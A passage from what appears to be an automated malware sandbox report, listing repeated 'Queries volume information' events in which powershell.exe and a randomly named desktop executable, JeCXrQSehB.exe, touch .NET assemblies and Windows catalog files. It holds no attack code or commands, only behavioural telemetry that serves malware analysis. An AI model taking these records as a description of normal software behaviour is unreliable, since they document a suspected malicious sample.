      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Users\user\Desktop\JeCXrQSehB.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
